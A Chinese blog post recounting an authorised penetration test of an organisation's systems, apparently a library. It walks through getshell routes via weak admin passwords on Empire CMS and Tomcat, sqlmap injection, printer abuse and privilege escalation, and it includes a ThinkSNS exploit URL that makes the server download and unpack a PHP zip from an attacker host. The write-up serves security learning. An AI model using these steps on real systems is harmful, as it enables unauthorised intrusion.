查看原文
其他

某次授权渗透测试小记

巡安似海 巡安似海 2022-11-05

0x00 前言

只做记录,供学习。


0x01 帝国CMS 后台GETSHELL

图书馆的一个系统,为开源CMS修改的,然后通过版本探测与其他的信息收集,发现那个版本好像有一个getshell,不过是后台的,尝试一下,账号admin密码123456发现对了之后网上找了个payload写入了shell。

点击提交后访问

http://xxxxx:port/e/admin/R3inSecurity\_Team.php

然后使用菜刀连接就可以了

不过需要注意的是,这里执行cmd命令会发现其实不是administrator,需要提权,因为当时除了这里其他地方已经获取到了administrator权限, 所以这个shell就没有提权


0x02 C-xxxx打印服务系统未授权访问

只要一直点直接打印,打印机就会一直出纸,也可以DIY打印内容,只需要替换框中的内容即可,后来沟通中反馈说打印机除了非常多的纸,部分员工还以为打印机坏了


0x03 tomcat弱口令GETSHELL

这个漏洞主要就是tomcat-user.xml的配置问题导致的,然后进到manger后上传shell的war包就可以了

这个账号admin 密码为空,然后上传war包就可以getshell了

打包好之后上传就可以啦



0x04 某卓越营销实践系统SQL注入getshell

这个漏洞没啥好说的,上去sqlmap一把嗦就完事了(其实这里还有一个存储型XSS)




然后远程链接服务器就可以了

这个服务器改端口了,本来是3389远程连接的,改成了3300,接下来就简单说一下,怎么找到3300这个端口的

Cmd输入tasklist /svc然后找到TermService找到PID2416

然后使用

netstat -aon|findstr "2416"

找到对应的PID就能找到远程端口



0x05 ThinkSNS管理员弱口令后台GetShell

弱口令登录,后台getshell

漏洞复现地址:

http://xxx/index.php?app=admin&mod=Upgrade&act=step1&upurl=http://xxx:port/test/UzJu.zip

由于配置问题,访问/data/upgrade就可以看到目录下的文件,data目录也是如此

将数据包的act改成setp2和upurl改成filename=UzJu.zip

然后去访问这个Php

然后正常获取权限就行,以下是漏洞代码的位置,漏洞代码发生在路径/apps/admin/lib/Action/UpgradeAction.class.php文件。

46行处,升级时调用check函数升级通过C('UPURL').'?v='.C('VERSION')获取升级链接

在169行,直接再次调用且upurl可控,覆盖之前的&upurl远程升级下载包含.php的UzJu.zip压缩包先下载再校验,存在逻辑问题,直接构造url/payload下载。此为漏洞的引发起始点,再往下看在226行处step2,Step2解压也存在问题未进行校验文件就进行解压到网站根目录


0x06 文件共享信息泄露

全是DB与数据


0x07 某卓越市场营销模拟平台垂直越权

登录不同的账号,就会有不同的路径,然后尝试改一改路径,发现可以越权,:)

两张图不难发现,我通过修改不同的路径,然后越权到了不同的权限,学生--->老师


内网信息收集,随便放几张图吧,太敏感了

弱口令,永远的神!

From:https://uzzju.com/?id=55

往期推荐 ●●

// 1

从SQL注入延时盲注到Get Database

// 2

一次HTB_Archetype的详细通关过程

// 3

Yii2 反序列化远程代码执行 POP链

// 4

利用云函数隐藏Webshell真实IP

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存